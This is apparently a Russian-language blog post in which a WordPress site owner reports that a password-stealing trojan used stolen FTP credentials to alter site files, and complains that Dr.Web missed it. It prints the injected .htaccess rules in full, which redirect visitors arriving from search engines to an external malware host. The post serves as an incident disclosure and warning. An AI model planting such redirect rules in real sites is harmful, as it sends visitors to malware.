Вирусная атака на сайты
Сегодня легли все мои сайты (включая этот), работающие на wordpress.
В связи с чем, до полной проверки сайта на паразитов, работа приостановлена.
Страница выводит ошибку:
Parse error:
syntax error, unexpected '< ' in
/home/www/user/wp-includes/default-filters.php
on line 229
В админку также не пускает.
Просмотр файлов через фтп-клиент выяснилось, что во всех файлах index*, main*, default*, а также в java-скриптах в самом конце прописался скрипт-троян.
Как выясняется, троян на локальном компе украл пароль доступа по фтп программы CuteFTP, и отредактировал файлы на сервере.
Лицензионный постоянно обновляемый drweb трояна не видит. Spider Guard своевременно троян не остановил, позволил ему беспрепятственно отправлять пароли к фтп-доступу, почте, аське и другим программам непонятно куда. В связи с чем, доктор вэб отправляется в утиль.
Файлы wordpress на сервере отредактировали эти трояны:
Trojan.NtRootKit.5303
Trojan.DownLoad1.26489
Кроме того троян внес изменения в карту сайта sitemap.xml,
изменил файл .htaccess
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://klaratsetkin.info/0/go.php?sid=3 [R,L]
Распространение трояна произведено с сайта klaratsetkin.info – занесите этот сайт в черный список.
Постовой: Новинки кино в Camrip | А здесь я качаю новые фильмы | эротика | кадровые агентства, кадровый центр Кадровое агентство КТВ
Постоянная ссылка | Теги: bug, download, drweb, haching, ntrootkit, Trojan, Wordpress
Добавить комментарий Trackback
нифига твой DRWEB не видит
смотри здесь www. virustotal. com/ru/
Это не мой доктор веб -)
А то, что он не видит вирусы, я уже убедился на своём печальном опыте.